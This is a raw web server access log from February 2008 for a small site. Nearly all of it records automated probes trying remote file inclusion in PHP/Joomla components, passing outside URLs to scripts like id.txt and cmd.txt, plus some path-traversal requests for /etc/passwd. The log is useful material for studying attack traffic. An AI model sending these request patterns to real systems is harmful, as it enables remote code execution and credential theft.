211.115.89.60 - - [10/Feb/2008:19:08:34 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:10:00 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:10:00 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
213.168.176.11 - - [10/Feb/2008:19:11:22 -0800] "GET /logs/access_071210.log/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.168.176.11 - - [10/Feb/2008:19:11:22 -0800] "GET /logs/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:11:36 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:11:38 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:11:39 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:13:00 -0800] "GET /logs/access_071231.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:13:00 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:13:25 -0800] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:14:21 -0800] "GET /logs/access_080127.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
66.79.163.220 - - [10/Feb/2008:19:14:31 -0800] "GET /logs/access_080127.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.dutchstockingpage.com/myid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:14:34 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:19:17:07 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:19:17:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
206.221.184.180 - - [10/Feb/2008:19:17:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.oldcommonwealth.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.195.44.107 - - [10/Feb/2008:19:18:57 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
67.195.44.92 - - [10/Feb/2008:19:18:58 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
213.168.176.11 - - [10/Feb/2008:19:19:09 -0800] "GET /logs/access_080107.log/index.php?dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:19:44 -0800] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:19:44 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:19:19:55 -0800] "GET /convert/mvcw.php?vwar_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:19:19:56 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:20:20 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:20:20 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:19:20:47 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:19:20:47 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
208.116.41.19 - - [10/Feb/2008:19:20:47 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.xshqiptaretx.org/kottt/asc/securespr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:21:01 -0800] "GET /logs/access.log//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:21:01 -0800] "GET //amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:21:01 -0800] "GET /logs//amember/plugins/payment/secpay/config.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:23:08 -0800] "GET //config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
64.20.38.186 - - [10/Feb/2008:19:23:08 -0800] "GET /logs//config.inc.php?path_escape=http://www.members.lycos.co.uk/hak4live/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:19:23:43 -0800] "GET /logs/access_080107.log/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:19:23:47 -0800] "GET /components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:19:23:51 -0800] "GET /logs/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:23:56 -0800] "GET /logs/access_071126.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:23:56 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:24:52 -0800] "GET /logs/access_071231.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:24:52 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:24:52 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:19:25:11 -0800] "GET /logs/access_071231.log/components/com_extcalendar/admin_events.php?http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
72.249.108.32 - - [10/Feb/2008:19:25:15 -0800] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
62.240.180.209 - - [10/Feb/2008:19:31:57 -0800] "GET /logs/access_071231.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.240.180.209 - - [10/Feb/2008:19:31:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
62.240.180.209 - - [10/Feb/2008:19:31:58 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
211.115.89.60 - - [10/Feb/2008:19:32:08 -0800] "GET /logs/access_071203.log//components/com_performs/performs.php?mosConfig_absolute_path=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
62.240.180.209 - - [10/Feb/2008:19:33:10 -0800] "GET /logs/access_071217.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gundam-gundam.net/derf? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
213.8.154.216 - - [10/Feb/2008:19:34:21 -0800] "GET /logs/index.php?url=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
213.8.154.216 - - [10/Feb/2008:19:34:21 -0800] "GET /index.php?url=http://viperwarez.com/scan/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:34:32 -0800] "GET /logs/access_071119.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
216.104.34.66 - - [10/Feb/2008:19:37:33 -0800] "GET /logs/access_080127.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:38:00 -0800] "GET /logs/access_080127.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:38:00 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:38:00 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:39:09 -0800] "GET /logs/access_071217.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:39:16 -0800] "GET /logs/access_071224.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:39:16 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:39:16 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:40:50 -0800] "GET /logs/access_071217.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:43:49 -0800] "GET /logs/access_071022.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:43:49 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:43:49 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:44:42 -0800] "GET /logs/access.log/principal.php?conteudo=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:44:43 -0800] "GET /principal.php?conteudo=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:44:43 -0800] "GET /logs/principal.php?conteudo=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.195.7.19 - - [10/Feb/2008:19:45:03 -0800] "GET /logs/access_071224.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
74.52.88.90 - - [10/Feb/2008:19:45:04 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://turnkeywebsites247.com/catimages/tstgif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
74.52.88.90 - - [10/Feb/2008:19:45:04 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://turnkeywebsites247.com/catimages/tstgif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:51:45 -0800] "GET /logs/access.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:53:48 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.6.20.233 - - [10/Feb/2008:19:54:59 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:56:10 -0800] "GET /logs/access_080114.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:56:37 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:56:39 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:56:41 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:19:57:36 -0800] "GET /logs/access_080114.log//init_basic.php?GALLERY_BASEDIR=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
87.106.131.26 - - [10/Feb/2008:19:57:59 -0800] "GET /logs/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.toulouseangloexchange.com"
87.106.131.26 - - [10/Feb/2008:19:57:59 -0800] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:20:00:21 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:20:00:23 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
222.127.223.73 - - [10/Feb/2008:20:00:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
74.6.22.10 - - [10/Feb/2008:20:06:02 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:09:57 -0800] "GET //tags.php?BBCodeFile=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:09:57 -0800] "GET /logs//tags.php?BBCodeFile=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
195.82.184.2 - - [10/Feb/2008:20:12:39 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
77.91.224.8 - - [10/Feb/2008:20:15:43 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
77.91.224.8 - - [10/Feb/2008:20:15:43 -0800] "GET /associationsMumsTots.html HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.toulouseangloexchange.com"
74.52.88.90 - - [10/Feb/2008:20:16:07 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/tstgif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
74.52.88.90 - - [10/Feb/2008:20:16:07 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://turnkeywebsites247.com/catimages/tstgif??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:20:19:26 -0800] "GET /logs/access_071112.log//newsletter/newsletter.php?waroot=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
193.252.3.200 - - [10/Feb/2008:20:19:32 -0800] "GET /logs//newsletter/newsletter.php?waroot=http://www.gvnr.xpg.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:20:20:29 -0800] "GET /logs/access_071231.log//classes/query.class.php?baseDir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:20:20:30 -0800] "GET //classes/query.class.php?baseDir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
209.31.183.74 - - [10/Feb/2008:20:20:30 -0800] "GET /logs//classes/query.class.php?baseDir=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:20:23:38 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:20:23:40 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
68.149.224.227 - - [10/Feb/2008:20:23:42 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:23:48 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
208.68.175.66 - - [10/Feb/2008:20:23:48 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.toulouseangloexchange.com"
195.82.184.2 - - [10/Feb/2008:20:25:04 -0800] "GET /logs/access_071126.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.82.184.2 - - [10/Feb/2008:20:25:05 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
195.82.184.2 - - [10/Feb/2008:20:25:05 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:20:30:45 -0800] "GET //language/lang_german/lang_main_album.php?phpbb_root_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.19.192.212 - - [10/Feb/2008:20:30:45 -0800] "GET /logs//language/lang_german/lang_main_album.php?phpbb_root_path=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
70.86.43.42 - - [10/Feb/2008:20:32:43 -0800] "GET /send_reminders.php?includedir=http://www.microtrack.co.kr/bbs/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.toulouseangloexchange.com"
